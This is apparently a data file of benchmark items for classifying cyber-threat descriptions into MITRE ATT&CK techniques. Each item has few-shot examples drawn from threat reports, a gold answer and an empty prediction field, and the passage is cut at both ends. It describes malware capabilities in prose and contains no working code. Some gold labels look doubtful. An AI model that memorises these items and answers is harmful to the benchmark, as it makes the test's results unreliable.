the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1554: Compromise Host Software Binary\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n", "input": "\nhas has extensively used strategic Web compromises to target victims.", "gold": "- T1189: Drive-by Compromise", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Diavol can use the ARP table to find remote hosts to scan.\n\t - T1018: Remote System Discovery\n- Text: Spark can collect the hostname, keyboard layout, and language from the system.\n\t - T1082: System Information Discovery\n- Text: A BlackEnergy 2 plug-in uses WMI to gather victim host details.\n\t - T1047: Windows Management Instrumentation\n", "input": "\nused Microsoft\u2019s Sysinternals tools to gather detailed information about remote systems.", "gold": "- T1018: Remote System Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrailBlazer has the ability to use WMI for persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: uses a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.\n\t - T1047: Windows Management Instrumentation\n- Text: Finally, Grandoreiro detects two virtual environments \u2013 VMWare via its special I/O port and Virtual PC via the vpcext instruction\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", "input": "\ncan use a WMI script to achieve persistence.", "gold": "- T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The BazarLoader DLL was immediately copied to another location and made persistent through the Windows registry\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1112: Modify Registry\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: The malware creates a shortcut %APPDATA%\\dotNET.lnk pointing to the copy of the malware under %APPDATA%.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", "input": "\nThe dropped files are either in the root of the \u201cProgramData\u201d folder or in a subdirectory", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kerrdown can download additional software including Cobalt Strike from servers on the victim's network.\n\t - T1570: Lateral Tool Transfer\n- Text: Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk\n\t - T1105: Ingress Tool Transfer\n- Text: H1N1 kills and disables services by using cmd.exe.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nis capable of providing Meterpreter shell access.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has the capability to capture video from a victim machine.\n\t - T1125: Video Capture\n- Text: The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible\n\t - T1113: Screen Capture\n- Text: Revenge RAT has a plugin for microphone interception.\n\t - T1123: Audio Capture\n", "input": "\ncaptures images from the webcam.", "gold": "- T1125: Video Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: Kerrdown can encrypt, encode, and compress multiple layers of shellcode.\n\t - T1027: Obfuscated Files or Information\n- Text: CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", "input": "\nThe file uses a character insertion obfuscation technique, making it appear to contain Chinese characters.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process \"/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment\".\n\t - T1056.002: Input Capture - GUI Input Capture\n- Text: After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.\n\t - T1539: Steal Web Session Cookie\n\t - T1113: Screen Capture\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1020.001: Automated Exfiltration - Traffic Duplication\n\t - T1056.003: Input Capture - Web Portal Capture\n- Text: has a keylogger.\n\t - T1056: Input Capture\n", "input": "\npresents an input prompt asking for the user's login and password.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: achieves persistence by creating a shortcut in the current user's Startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: A Turla Javascript backdoor added a local_update_check value under the Registry key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nachieves persistence by creating a shortcut in the Startup folder.", "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n- Text: installer searches the Registry and system to see if specific antivirus tools are installed on the system.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts\n\t - T1497: Virtualization/Sandbox Evasion\n", "input": "\nchecks for ant-sandboxing software such as virtual PC, sandboxie, and VMware.", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.\n\t - T1005: Data from Local System\n- Text: created a directory named \"out\" in the user's %AppData% folder and copied files to it.\n\t - T1074: Data Staged\n- Text: FIN8 aggregates staged data from a network into a single location.\n\t - T1074.002: Data Staged - Remote Data Staging\n", "input": "\ncan be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: Neoichor can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: has used CMSTP.exe and a malicious INF to execute its payload.\n\t - T1218.003: System Binary Proxy Execution - CMSTP\n", "input": "\ncan bypass UAC and create an elevated COM object to escalate privileges.", "gold": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.\n\t - T1090.002: Proxy - External Proxy\n- Text: Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\ncan gather information about the victim proxy server.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WINERACK can gather information on the victim username.\n\t - T1033: System Owner/User Discovery\n- Text: PoshC2 can enumerate local and domain user account information.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Dragonfly 2.0 used batch scripts to enumerate users on a victim domain controller.\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\ncan gather the username from the victim\u2019s machine.", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: In one instance, menuPass added PlugX as a service with a display name of \"Corel Writing Tools Utility.\"\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Dragonfly 2.0 compromised user credentials and used valid accounts for operations.\n\t - T1078: Valid Accounts\n", "input": "\nThis is consistent with most espionage-motivated adversaries, as once the adversary gains access via legitimate credentials, they are able to masquerade as a legitimate user and essentially become an insider threat", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This script\u00a0is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate).\u00a0The same can be found in Pony 1.9 code\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: BlackEnergy 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.\n\t - T1485: Data Destruction\n- Text: HELLOKITTY can delete volume shadow copies on compromised hosts.\n\t - T1490: Inhibit System Recovery\n", "input": "\nwill delete files on the system.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Babuk has the ability to use the command line to control execution on compromised hosts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: When neither of the previous commands are received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server.\n\t - T1059: Command and Scripting Interpreter\n\t - T1202: Indirect Command Execution\n", "input": "\ncan execute shell commands.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OSInfo enumerates local and domain users\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: obtains the victim username.\n\t - T1033: System Owner/User Discovery\n- Text: menuPass has used \"net use\" to conduct connectivity checks to machines.\n\t - T1049: System Network Connections Discovery\n", "input": "\nlists local users and session information.", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook\n\t - T1027: Obfuscated Files or Information\n- Text: ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: FlawedAmmyy has used SEAL encryption during the initial C2 handshake.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nuses an XOR 0x1 loop to encrypt its C2 domain.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Valak has the ability to exfiltrate data over the C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Crutch has automatically exfiltrated stolen files to Dropbox.\n\t - T1020: Automated Exfiltration\n- Text: creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.\n\t - T1029: Scheduled Transfer\n", "input": "\nexfiltrates data over its C2 channel.", "gold": "- T1041: Exfiltration Over C2 Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Koadic can use Rundll32 to execute additional payloads.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: DanBot can use VNC for remote access to targeted systems.\n\t - T1021.005: Remote Services - VNC\n- Text: The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\ninstalls VNC server software that executes through rundll32.", "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When the attackers need to send a file or command to the victim machine, they place them to the folder named d in the victim\u2019s Dropbox folder. The malware retrieves this folder and downloads all its contents to the working folder\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- Text: In the analyzed sample the RAT component was named \u201cBotDLL[.]dll\u201d. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access\n\t - T1125: Video Capture\n\t - T1090: Proxy\n\t - T1005: Data from Local System\n- Text: Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives.\n\t - T1025: Data from Removable Media\n", "input": "\nstages data it copies from the local system or removable drives in the \"%WINDIR%\\$NtUninstallKB885884$\\\" directory.", "gold": "- T1074: Data Staged", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Bluetooth functionality in Flamer is encoded in a module called \"BeetleJuice\". This module is triggered according to configuration values set by the attacker. This means that a computer compromised by W32.Flamer will appear when any other Bluetooth device scans the local area. In addition to enabling a Bluetooth beacon, Flamer encodes details about the infected computer (see Figure 1) and then stores these details in a special 'description' field. When any other device scans for Bluetooth-enabled devices, this description field will be displayed: These are the facts of how Flamer uses Bluetooth. The attacker, however, could identify the location of compromised devices using Bluetooth. The Beetlejuice module already has retrieved a list of all the devices IDs which are near to the infected computer and so the attacker knows what devices belong to the victim. Some attacks have even identified Bluetooth devices more than one mile away. With increase functionality an attacker, having identified various Bluetooth devices in range, could perform numerous attacks: - Steal contacts from an address book, steals SMS messages, steals images, and more. An attacker within one mile of the target could use their own Bluetooth-enabled device for this. If the second computer is using a secured network and was infected through a USB connection, potentially the only network available would be a Bluetooth connection back to the first compromised computer\n\t - T1011.001: Exfiltration Over Other Network Medium - Exfiltration Over Bluetooth\n- Text: During Operation Wocao, threat actors discovered removable disks attached to a system.\n\t - T1120: Peripheral Device Discovery\n", "input": "\nhas a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.", "gold": "- T1011: Exfiltration Over Other Network Medium", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An backdoor may collect the entire contents of an inserted USB device.\n\t - T1025: Data from Removable Media\n- Text: Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.\n\t - T1119: Automated Collection\n- Text: Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the Internet cache directory of the IE browser\n\t - T1005: Data from Local System\n", "input": "\ncontains a module to collect data from removable drives.", "gold": "- T1025: Data from Removable Media", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: Mythic provides various transform functions to encode and/or randomize C2 data.\n\t - T1132: Data Encoding\n", "input": "\nobfuscates C2 traffic with an altered version of base64.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation CuckooBees, the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: The malware operates on victims\u2019 systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks\n\t - T1543: Create or Modify System Process\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Hildegard has started a monero service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n", "input": "\nhas a tool that creates a new service for persistence.", "gold": "- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers.\n\t - T1542.002: Pre-OS Boot - Component Firmware\n- Text: APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.\n\t - T1556.007: Modify Authentication Process - Hybrid Identity\n- Text: Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.\n\t - T1611: Escape to Host\n", "input": "\nThese platforms may not be well maintained and may break intermittently", "gold": "- T1083: File and 